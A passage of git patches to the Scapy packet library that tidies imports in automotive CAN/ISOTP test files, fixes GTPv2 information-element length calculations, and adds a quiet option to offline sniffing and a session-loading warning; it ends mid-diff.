8f8eb867289..9415717486d 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -6,7 +6,8 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, threading, six, subprocess, sys +import subprocess, sys +import scapy.modules.six as six from subprocess import call from scapy.consts import LINUX @@ -18,7 +19,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 244adaa192e..cfeb915452a 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -6,7 +6,8 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, threading, six, subprocess, time, sys +import subprocess, sys +import scapy.modules.six as six from subprocess import call from scapy.consts import LINUX @@ -18,7 +19,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 57102fed9de..c0df953a80f 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -6,7 +6,8 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, six, subprocess, sys +import subprocess, sys +import scapy.modules.six as six from subprocess import call from scapy.consts import LINUX @@ -18,7 +19,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index 11be0d586a0..735d45aad5b 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -6,7 +6,8 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, threading, six, subprocess, sys +import subprocess, sys +import scapy.modules.six as six from subprocess import call from scapy.consts import LINUX @@ -18,7 +19,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index eef8c91517f..1da5543a7e9 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -6,7 +6,8 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, threading, six, subprocess, sys +import scapy.modules.six as six +import subprocess, sys from six.moves.queue import Queue from subprocess import call from io import BytesIO @@ -60,7 +61,8 @@ else: ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 90f50b5d93c..b77606cc0f1 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -6,8 +6,9 @@ = Imports load_layer("can") conf.contribs['CAN']['swap-bytes'] = False -import os, threading, six, subprocess, sys +import os, subprocess, sys from subprocess import call +import scapy.modules.six as six from scapy.contrib.isotp import send_multiple_ext, filter_periodic_packets, scan, scan_extended from scapy.consts import LINUX @@ -20,7 +21,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 2f749d378ce..7a5e5e52db4 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -7,10 +7,10 @@ = Imports load_layer("can") -import os, threading, six, subprocess, sys +import threading, subprocess, sys +import scapy.modules.six as six from subprocess import call - = Definition of constants, utility functions and mock classes iface0 = "vcan0" iface1 = "vcan1" @@ -19,7 +19,8 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index 85043f1cbe4..1631c4354f6 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -6,8 +6,9 @@ = Imports load_layer("can") -import os, six, subprocess, sys +import subprocess, sys from subprocess import call +import scapy.modules.six as six from scapy.contrib.automotive.ecu import * = Definition of constants, utility functions and mock classes @@ -18,11 +19,19 @@ iface1 = "vcan1" ISOTP_KERNEL_MODULE_AVAILABLE = False def exit_if_no_isotp_module(): if not ISOTP_KERNEL_MODULE_AVAILABLE: - sys.stderr.write("TEST SKIPPED: can-isotp not available" + os.linesep) + err = "TEST SKIPPED: can-isotp not available\n" + sys.__stderr__.write(err) warning("Can't test ISOTP native socket because kernel module is not loaded") exit(0) +def temporary_skip_unstable_test(): + err = "TEST SKIPPED: Unstable unit test. Stabilize me!\n" + sys.__stderr__.write(err) + warning("Unstable unit test. FIXME!") + exit(0) + + = Initialize a virtual CAN interface if 0 != call(["cansend", iface0, "000#"]): # vcan0 is not enabled @@ -178,6 +187,7 @@ load_contrib('automotive.obd.obd') + Simulate scanner = Test DTC scan +temporary_skip_unstable_test() drain_bus(iface0) @@ -205,6 +215,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, = Test supported PIDs scan +temporary_skip_unstable_test() drain_bus(iface0) @@ -260,6 +271,7 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, = Test full scan +temporary_skip_unstable_test() drain_bus(iface0) From eafd148be406fe7913079e6071d4ec4c3a6b3b89 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 01:44:52 -0400 Subject: [PATCH 0087/1632] Fix length computing formula --- scapy/contrib/gtp_v2.py | 110 ++++++++++++++++++++++------------------ 1 file changed, 62 insertions(+), 48 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 222e7e4c201..8c29ad65931 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -265,7 +265,7 @@ def answers(self, other): class IE_IPv4(gtp.IE_Base): name = "IE IPv4" fields_desc = [ByteEnumField("ietype", 74, IEType), - FieldLenField("length", None, length_of="IPv4", + FieldLenField("length", None, length_of="address", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -299,7 +299,7 @@ def IE_Dispatcher(s): class IE_EPSBearerID(gtp.IE_Base): name = "IE EPS Bearer ID" fields_desc = [ByteEnumField("ietype", 73, IEType), - FieldLenField("length", None, length_of="EPS Bearer ID", + FieldLenField("length", None, length_of="EBI", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -309,7 +309,7 @@ class IE_EPSBearerID(gtp.IE_Base): class IE_RAT(gtp.IE_Base): name = "IE RAT" fields_desc = [ByteEnumField("ietype", 82, IEType), - FieldLenField("length", None, length_of="RAT", + FieldLenField("length", None, length_of="RAT_type", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -319,8 +319,9 @@ class IE_RAT(gtp.IE_Base): class IE_ServingNetwork(gtp.IE_Base): name = "IE Serving Network" fields_desc = [ByteEnumField("ietype", 83, IEType), - FieldLenField("length", None, length_of="Serving Network", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -402,9 +403,9 @@ class IE_ULI(gtp.IE_Base): name = "IE User Location Information" fields_desc = [ ByteEnumField("ietype", 86, IEType), - FieldLenField("length", None, - length_of="User Location Information", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -481,8 +482,9 @@ class IE_ULI(gtp.IE_Base): class IE_UCI(gtp.IE_Base): name = "IE UCI" fields_desc = [ByteEnumField("ietype", 145, IEType), - FieldLenField("length", None, length_of="UCI", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -498,8 +500,9 @@ class IE_UCI(gtp.IE_Base): class IE_FTEID(gtp.IE_Base): name = "IE F-TEID" fields_desc = [ByteEnumField("ietype", 87, IEType), - FieldLenField("length", None, length_of="F-TEID", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("ipv4_present", 0, 1), @@ -515,7 +518,7 @@ class IE_FTEID(gtp.IE_Base): class IE_BearerContext(gtp.IE_Base): name = "IE Bearer Context" fields_desc = [ByteEnumField("ietype", 93, IEType), - FieldLenField("length", None, length_of="Bearer Context", + FieldLenField("length", None, length_of="IE_list", adjust=lambda pkt, x: x, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -526,8 +529,9 @@ class IE_BearerContext(gtp.IE_Base): class IE_BearerFlags(gtp.IE_Base): name = "IE Bearer Flags" fields_desc = [ByteEnumField("ietype", 97, IEType), - FieldLenField("length", None, length_of="Bearer Flags", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 4), @@ -540,7 +544,9 @@ class IE_BearerFlags(gtp.IE_Base): class IE_NotImplementedTLV(gtp.IE_Base): name = "IE not implemented" fields_desc = [ByteEnumField("ietype", 0, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), StrLenField("data", "", length_from=lambda x: x.length)] @@ -659,8 +665,9 @@ class IE_IMSI(gtp.IE_Base): class IE_Cause(gtp.IE_Base): name = "IE Cause" fields_desc = [ByteEnumField("ietype", 2, IEType), - FieldLenField("length", None, length_of="Cause", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -673,7 +680,7 @@ class IE_Cause(gtp.IE_Base): class IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - FieldLenField("length", None, length_of="Recovery Restart", + FieldLenField("length", None, length_of="restart_counter", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -694,11 +701,11 @@ class IE_APN(gtp.IE_Base): class IE_BearerTFT(gtp.IE_Base): name = "IE Bearer TFT" fields_desc = [ByteEnumField("ietype", 84, IEType), - FieldLenField("length", None, length_of="Bearer TFT", + FieldLenField("length", None, length_of="Bearer_TFT", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - StrLenField("Bearer TFT", "", + StrLenField("Bearer_TFT", "", length_from=lambda x: x.length)] @@ -726,8 +733,9 @@ class IE_MSISDN(gtp.IE_Base): class IE_Indication(gtp.IE_Base): name = "IE Indication" fields_desc = [ByteEnumField("ietype", 77, IEType), - FieldLenField("length", None, length_of="Indication", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("DAF", 0, 1), @@ -1087,8 +1095,9 @@ def PCO_protocol_dispatcher(s): class IE_PCO(gtp.IE_Base): name = "IE Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 78, IEType), - FieldLenField("length", None, length_of="PCO", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("Extension", 0, 1), @@ -1101,8 +1110,9 @@ class IE_PCO(gtp.IE_Base): class IE_PAA(gtp.IE_Base): name = "IE PAA" fields_desc = [ByteEnumField("ietype", 79, IEType), - FieldLenField("length", None, length_of="PAA", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1121,8 +1131,9 @@ class IE_PAA(gtp.IE_Base): class IE_Bearer_QoS(gtp.IE_Base): name = "IE Bearer Quality of Service" fields_desc = [ByteEnumField("ietype", 80, IEType), - FieldLenField("length", None, length_of="Bearer QoS", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 1), @@ -1140,7 +1151,7 @@ class IE_Bearer_QoS(gtp.IE_Base): class IE_ChargingID(gtp.IE_Base): name = "IE Charging ID" fields_desc = [ByteEnumField("ietype", 94, IEType), - FieldLenField("length", None, length_of="Charging ID", + FieldLenField("length", None, length_of="ChargingID", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1151,7 +1162,7 @@ class IE_ChargingCharacteristics(gtp.IE_Base): name = "IE Charging Characteristics" fields_desc = [ByteEnumField("ietype", 95, IEType), FieldLenField("length", None, - length_of="Charging Characteristics", + length_of="ChargingCharacteristric", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1161,7 +1172,7 @@ class IE_ChargingCharacteristics(gtp.IE_Base): class IE_PDN_type(gtp.IE_Base): name = "IE PDN Type" fields_desc = [ByteEnumField("ietype", 99, IEType), - FieldLenField("length", None, length_of="PDN Type", + FieldLenField("length", None, length_of="PDN_type", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1172,8 +1183,9 @@ class IE_PDN_type(gtp.IE_Base): class IE_UE_Timezone(gtp.IE_Base): name = "IE UE Time zone" fields_desc = [ByteEnumField("ietype", 114, IEType), - FieldLenField("length", None, length_of="UE Time zone", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("Timezone", 0), @@ -1183,7 +1195,7 @@ class IE_UE_Timezone(gtp.IE_Base): class IE_Port_Number(gtp.IE_Base): name = "IE Port Number" fields_desc = [ByteEnumField("ietype", 126, IEType), - FieldLenField("length", None, length_of="Port Number", + FieldLenField("length", None, length_of="PortNumber", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1193,7 +1205,7 @@ class IE_Port_Number(gtp.IE_Base): class IE_APN_Restriction(gtp.IE_Base): name = "IE APN Restriction" fields_desc = [ByteEnumField("ietype", 127, IEType), - FieldLenField("length", None, length_of="APN Restriction", + FieldLenField("length", None, length_of="APN_Restriction", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1203,7 +1215,7 @@ class IE_APN_Restriction(gtp.IE_Base): class IE_SelectionMode(gtp.IE_Base): name = "IE Selection Mode" fields_desc = [ByteEnumField("ietype", 128, IEType), - FieldLenField("length", None, length_of="Selection Mode", + FieldLenField("length", None, length_of="SelectionMode", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1214,8 +1226,9 @@ class IE_SelectionMode(gtp.IE_Base): class IE_MMBR(gtp.IE_Base): name = "IE Max MBR/APN-AMBR (MMBR)" fields_desc = [ByteEnumField("ietype", 161, IEType), - FieldLenField("length", None, length_of="MMBR", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("uplink_rate", 0), @@ -1225,10 +1238,9 @@ class IE_MMBR(gtp.IE_Base): class IE_UPF_SelInd_Flags(gtp.IE_Base): name = "IE UP Function Selection Indication Flags" fields_desc = [ByteEnumField("ietype", 202, IEType), - FieldLenField("length", None, - length_of="UP Function Selection" + - "Indication Flags", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 7), @@ -1238,8 +1250,9 @@ class IE_UPF_SelInd_Flags(gtp.IE_Base): class IE_FQCSID(gtp.IE_Base): name = "IE FQ-CSID" fields_desc = [ByteEnumField("ietype", 132, IEType), - FieldLenField("length", None, length_of="FQ-CSID", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("nodeid_type", 0, 4), @@ -1251,8 +1264,9 @@ class IE_FQCSID(gtp.IE_Base): class IE_Ran_Nas_Cause(gtp.IE_Base): name = "IE RAN/NAS Cause" fields_desc = [ByteEnumField("ietype", 172, IEType), - FieldLenField("length", None, length_of="RAN/NAS Cause", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4 , fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("protocol_type", 0, 4), @@ -1265,7 +1279,7 @@ class IE_PrivateExtension(gtp.IE_Base): name = "Private Extension" fields_desc = [ ByteEnumField("ietype", 255, IEType), - FieldLenField("length", None, length_of="Private Extension", + FieldLenField("length", None, length_of="enterprisenum", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("SPARE", 0, 4), BitField("instance", 0, 4), From d454cd6b9421e6b570dcd8a09adf219b67e8277a Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 01:49:07 -0400 Subject: [PATCH 0088/1632] Remove whitespace before comma --- scapy/contrib/gtp_v2.py | 32 ++++++++++++++++---------------- 1 file changed, 16 insertions(+), 16 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 8c29ad65931..ff413b76b75 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -321,7 +321,7 @@ class IE_ServingNetwork(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 83, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -405,7 +405,7 @@ class IE_ULI(gtp.IE_Base): ByteEnumField("ietype", 86, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -484,7 +484,7 @@ class IE_UCI(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 145, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("MCC", "", 2), @@ -502,7 +502,7 @@ class IE_FTEID(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 87, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("ipv4_present", 0, 1), @@ -531,7 +531,7 @@ class IE_BearerFlags(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 97, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 4), @@ -546,7 +546,7 @@ class IE_NotImplementedTLV(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 0, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), StrLenField("data", "", length_from=lambda x: x.length)] @@ -667,7 +667,7 @@ class IE_Cause(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 2, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteEnumField("Cause", 1, CAUSE_VALUES), @@ -735,7 +735,7 @@ class IE_Indication(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 77, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("DAF", 0, 1), @@ -1097,7 +1097,7 @@ class IE_PCO(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 78, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("Extension", 0, 1), @@ -1112,7 +1112,7 @@ class IE_PAA(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 79, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1133,7 +1133,7 @@ class IE_Bearer_QoS(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 80, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 1), @@ -1185,7 +1185,7 @@ class IE_UE_Timezone(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 114, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("Timezone", 0), @@ -1228,7 +1228,7 @@ class IE_MMBR(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 161, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("uplink_rate", 0), @@ -1240,7 +1240,7 @@ class IE_UPF_SelInd_Flags(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 202, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 7), @@ -1252,7 +1252,7 @@ class IE_FQCSID(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 132, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("nodeid_type", 0, 4), @@ -1266,7 +1266,7 @@ class IE_Ran_Nas_Cause(gtp.IE_Base): fields_desc = [ByteEnumField("ietype", 172, IEType), FieldLenField("length", None, length_of="length", adjust=lambda pkt, x: len(pkt.payload) + - 4 , fmt="H"), + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("protocol_type", 0, 4), From 41c225b71efc17209fa2e808bccccc9d03fd207a Mon Sep 17 00:00:00 2001 From: Roy Kupershmid Date: Mon, 30 Mar 2020 19:00:14 +0300 Subject: [PATCH 0089/1632] Discard stderr output when using `offline` attribute of `sniff` --- scapy/sendrecv.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index fd2f11da238..a2b28934c96 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -767,6 +767,8 @@ class AsyncSniffer(object): --Ex: lfilter = lambda x: x.haslayer(Padding) offline: PCAP file (or list of PCAP files) to read packets from, instead of sniffing them + quiet: when set to True, the process stderr is discarded + (default: False). timeout: stop sniffing after a given time (default: None). L2socket: use the provided L2socket (default: use conf.L2listen). opened_socket: provide an object (or a list of objects) ready to use @@ -824,7 +826,7 @@ def _setup_thread(self): def _run(self, count=0, store=True, offline=None, - prn=None, lfilter=None, + quiet=False, prn=None, lfilter=None, L2socket=None, timeout=None, opened_socket=None, stop_filter=None, iface=None, started_callback=None, session=None, session_args=[], session_kwargs={}, @@ -882,7 +884,10 @@ def _write_to_pcap(packets_list): sniff_sockets[PcapReader( offline if flt is None else - tcpdump(offline, args=["-w", "-", flt], getfd=True) + tcpdump(offline, + args=["-w", "-", flt], + getfd=True, + quiet=quiet) )] = offline if not sniff_sockets or iface is not None: if L2socket is None: From aed34f4475bc2d941c3af0763eae2c85a8da2c10 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 12 Apr 2020 11:10:00 +0200 Subject: [PATCH 0090/1632] Warn if a Python3 session cannot be opened on Python2 --- scapy/main.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/main.py b/scapy/main.py index 30bc53669e2..803079644f6 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -418,6 +418,9 @@ def init_session(session_name, # type: Optional[Union[str, None]] except IOError: SESSION = six.moves.cPickle.load(open(session_name, "rb")) log_loading.info("Using session [%s]" % session_name) + except ValueError: + msg = "Error opening Python3 pickled session on Python2 [%s]" + log_loading.error(msg % session_name) except EOFError: log_loading.error("Error opening session [%s]" % session_name) except AttributeError: From 6fdf21a35c4df4ef5e07af189324dc16e05e7985 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 16:52:47 -0400 Subject: [PATCH 0091/1632] Fix length for Indication IE --- scapy/contrib/gtp_v2.py | 66 +++++++++++++++++++++++++---------------- 1 file changed, 41 insertions(+), 25 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index ff413b76b75..c2cc4836e10 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -279,7 +279,8 @@ class IE_MEI(gtp.IE_Base): adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - LongField("MEI", 0)] + gtp.TBCDByteField("MEI", "175675478970685", + length_from=lambda x: x.length)] def IE_Dispatcher(s): @@ -733,28 +734,41 @@ class IE_MSISDN(gtp.IE_Base): class IE_Indication(gtp.IE_Base): name = "IE Indication" fields_desc = [ByteEnumField("ietype", 77, IEType), - FieldLenField("length", None, length_of="length", - 